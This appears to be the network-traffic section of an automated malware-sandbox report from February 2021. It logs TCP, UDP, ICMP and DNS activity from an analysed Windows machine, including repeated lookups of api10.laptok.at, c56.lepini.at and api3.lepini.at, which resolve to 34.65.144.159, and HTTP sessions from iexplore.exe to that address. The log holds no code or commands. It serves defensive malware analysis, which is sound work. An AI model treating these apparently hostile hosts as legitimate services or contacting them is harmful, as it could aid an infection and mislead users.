                                                                                Feb 16, 2021 00:58:56.470968962 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.471003056 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.471118927 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.516905069 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.516974926 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517018080 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517055988 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517096996 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517129898 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517148972 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517177105 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517216921 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517220974 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517263889 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517296076 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517333984 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517363071 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517456055 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517462969 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517488956 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517529011 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517564058 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517595053 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517627954 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517632008 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517683029 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517724991 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517761946 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517812014 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517812014 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517865896 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517906904 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517916918 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517954111 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517966032 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518014908 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518057108 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518062115 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518110037 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518153906 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518156052 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518209934 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518255949 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518263102 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518316031 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518362045 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518400908 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518493891 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.815437078 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.815592051 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:57.371340036 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:57.371423006 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:58.427213907 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:58.427453995 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.626430035 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.672249079 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:59.672274113 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:59.672349930 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.857465029 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.861767054 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.907371998 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:05.510451078 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:05.558578968 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:05.558753014 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:05.558873892 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:05.647444010 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.251410007 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.251626015 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.251652956 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.298836946 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.687948942 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.735898972 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.736171961 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.736301899 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.736310005 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.782016039 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:07.282991886 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:07.283123970 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:07.293183088 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:07.342428923 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.273911953 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.319516897 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.324184895 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.534192085 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.623342991 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.940006018 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.940227032 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.940260887 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.985836029 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:21.306014061 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306123018 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306181908 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306322098 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306462049 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306497097 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.311475039 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:59:21.311580896 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:59:21.349736929 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349757910 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349786997 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349812984 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349813938 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.349833965 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.349839926 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349860907 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.349867105 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349895000 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349899054 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.349930048 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.349936008 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.349967003 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.350019932 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.350059986 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.350083113 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.350109100 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.350143909 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.350182056 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.351311922 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.351342916 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:59:21.351427078 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.351460934 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.362787008 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:59:21.362854004 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:59:21.362858057 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:59:21.362926960 CET49746443192.168.2.4104.20.184.68

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 16, 2021 00:57:23.851677895 CET4991053192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:23.900485992 CET53499108.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:25.017621040 CET5585453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:25.069145918 CET53558548.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:26.418047905 CET6454953192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:26.469609022 CET53645498.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:27.394536018 CET6315353192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:27.445816994 CET53631538.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:29.038602114 CET5299153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:29.087210894 CET53529918.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:30.450037003 CET5370053192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:30.477531910 CET5172653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:30.501523018 CET53537008.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:30.538741112 CET53517268.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:31.518785000 CET5679453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:31.577409983 CET53567948.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:31.814762115 CET5653453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:31.854856014 CET5662753192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:31.865664005 CET53565348.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:31.906656981 CET53566278.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:32.292648077 CET5662153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:32.341365099 CET53566218.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:32.361624956 CET6311653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:32.424207926 CET53631168.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:34.188555002 CET6407853192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:34.256162882 CET53640788.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:34.628803015 CET6480153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:34.677495003 CET53648018.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:34.713625908 CET6172153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:34.785234928 CET53617218.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:36.568550110 CET5125553192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:36.635288954 CET53512558.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:37.263225079 CET6152253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:37.338659048 CET53615228.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:37.863677979 CET5233753192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:37.924860954 CET53523378.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:38.229052067 CET5504653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:38.288559914 CET53550468.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:38.749363899 CET4961253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:38.797986984 CET53496128.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:39.318974018 CET4928553192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:39.378199100 CET53492858.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:41.428900957 CET5060153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:41.477629900 CET53506018.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:42.392105103 CET6087553192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:42.440912962 CET53608758.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:46.480389118 CET5644853192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:46.529041052 CET53564488.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:47.485802889 CET5917253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:47.534482956 CET53591728.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:48.826155901 CET6242053192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:48.874833107 CET53624208.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:50.114090919 CET6057953192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:50.165975094 CET53605798.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:51.658611059 CET5018353192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:51.707384109 CET53501838.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:52.600389957 CET6153153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:52.649260044 CET53615318.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:57:58.247303963 CET4922853192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:57:58.305866003 CET53492288.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:00.407489061 CET5979453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:00.464531898 CET53597948.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:01.269284964 CET5591653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:01.318131924 CET53559168.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:01.437333107 CET5979453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:01.494563103 CET53597948.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:02.275814056 CET5591653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:02.324444056 CET53559168.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:02.444276094 CET5979453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:02.501357079 CET53597948.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:03.287058115 CET5591653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:03.344410896 CET53559168.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:04.454550982 CET5979453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:04.514353991 CET53597948.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:05.298243046 CET5591653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:05.346859932 CET53559168.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:08.521122932 CET5979453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:08.569654942 CET53597948.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:08.847168922 CET5275253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:09.309441090 CET5591653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:09.359087944 CET53559168.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:09.856961966 CET5275253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:10.156774998 CET53527528.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:10.168512106 CET53527528.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:12.720505953 CET6054253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:12.778403997 CET53605428.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:13.333923101 CET6068953192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:13.385102987 CET53606898.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:13.473896980 CET6420653192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:13.533735991 CET53642068.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:13.779700994 CET5090453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:13.839030027 CET53509048.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:14.131258965 CET5752553192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:14.188517094 CET53575258.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:14.923285007 CET5381453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:14.975915909 CET53538148.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:15.465820074 CET5341853192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:15.524085999 CET53534188.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:16.123310089 CET6283353192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:16.149136066 CET5926053192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:16.183051109 CET53628338.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:16.208272934 CET53592608.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:16.857649088 CET4994453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:16.906308889 CET53499448.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:17.105812073 CET6330053192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:17.165864944 CET53633008.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:17.778377056 CET6144953192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:17.835416079 CET53614498.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:19.385588884 CET5127553192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:19.442615986 CET53512758.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:19.901582003 CET6349253192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:19.958559036 CET53634928.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:36.070688009 CET5894553192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:36.128077030 CET53589458.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:58:55.906318903 CET6077953192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:58:56.196962118 CET53607798.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:59:03.718739986 CET6401453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:59:03.767468929 CET53640148.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:59:05.158071995 CET5709153192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:59:05.209448099 CET53570918.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:59:05.444958925 CET5590453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:59:05.504158974 CET53559048.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:59:06.626705885 CET5210953192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:59:06.687158108 CET53521098.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:59:08.215668917 CET5445053192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:59:08.273060083 CET53544508.8.8.8192.168.2.4
                                                                                Feb 16, 2021 00:59:09.736731052 CET4937453192.168.2.48.8.8.8
                                                                                Feb 16, 2021 00:59:09.793631077 CET53493748.8.8.8192.168.2.4

                                                                                ICMP Packets

                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                Feb 16, 2021 00:58:10.168631077 CET192.168.2.48.8.8.8d003(Port unreachable)Destination Unreachable

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Feb 16, 2021 00:57:31.814762115 CET192.168.2.48.8.8.80x5b17Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.188555002 CET192.168.2.48.8.8.80x4996Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.628803015 CET192.168.2.48.8.8.80x891Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.713625908 CET192.168.2.48.8.8.80x1c4eStandard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:36.568550110 CET192.168.2.48.8.8.80x5c3eStandard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:37.263225079 CET192.168.2.48.8.8.80xec16Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:37.863677979 CET192.168.2.48.8.8.80x5730Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:38.229052067 CET192.168.2.48.8.8.80xc9aStandard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:39.318974018 CET192.168.2.48.8.8.80xd5eeStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:08.847168922 CET192.168.2.48.8.8.80xaf9aStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:09.856961966 CET192.168.2.48.8.8.80xaf9aStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:13.779700994 CET192.168.2.48.8.8.80xa6f4Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:17.105812073 CET192.168.2.48.8.8.80x42fcStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:55.906318903 CET192.168.2.48.8.8.80x965cStandard query (0)c56.lepini.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:03.718739986 CET192.168.2.48.8.8.80x7e54Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:05.444958925 CET192.168.2.48.8.8.80x73deStandard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:06.626705885 CET192.168.2.48.8.8.80xf553Standard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:08.215668917 CET192.168.2.48.8.8.80x517Standard query (0)api3.lepini.atA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Feb 16, 2021 00:57:31.865664005 CET8.8.8.8192.168.2.40x5b17No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.256162882 CET8.8.8.8192.168.2.40x4996No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.677495003 CET8.8.8.8192.168.2.40x891No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.677495003 CET8.8.8.8192.168.2.40x891No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:34.785234928 CET8.8.8.8192.168.2.40x1c4eNo error (0)contextual.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:36.635288954 CET8.8.8.8192.168.2.40x5c3eNo error (0)lg3.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:37.338659048 CET8.8.8.8192.168.2.40xec16No error (0)hblg.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:37.924860954 CET8.8.8.8192.168.2.40x5730No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                Feb 16, 2021 00:57:38.288559914 CET8.8.8.8192.168.2.40xc9aNo error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                Feb 16, 2021 00:57:38.288559914 CET8.8.8.8192.168.2.40xc9aNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                Feb 16, 2021 00:57:39.378199100 CET8.8.8.8192.168.2.40xd5eeNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                Feb 16, 2021 00:57:39.378199100 CET8.8.8.8192.168.2.40xd5eeNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:39.378199100 CET8.8.8.8192.168.2.40xd5eeNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:39.378199100 CET8.8.8.8192.168.2.40xd5eeNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:57:39.378199100 CET8.8.8.8192.168.2.40xd5eeNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:10.156774998 CET8.8.8.8192.168.2.40xaf9aNo error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:10.168512106 CET8.8.8.8192.168.2.40xaf9aNo error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:13.839030027 CET8.8.8.8192.168.2.40xa6f4No error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:17.165864944 CET8.8.8.8192.168.2.40x42fcNo error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:58:56.196962118 CET8.8.8.8192.168.2.40x965cNo error (0)c56.lepini.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:03.767468929 CET8.8.8.8192.168.2.40x7e54No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:05.504158974 CET8.8.8.8192.168.2.40x73deNo error (0)api3.lepini.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:06.687158108 CET8.8.8.8192.168.2.40xf553No error (0)api3.lepini.at34.65.144.159A (IP address)IN (0x0001)
                                                                                Feb 16, 2021 00:59:08.273060083 CET8.8.8.8192.168.2.40x517No error (0)api3.lepini.at34.65.144.159A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • api10.laptok.at
                                                                                • c56.lepini.at
                                                                                • api3.lepini.at

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.44977534.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
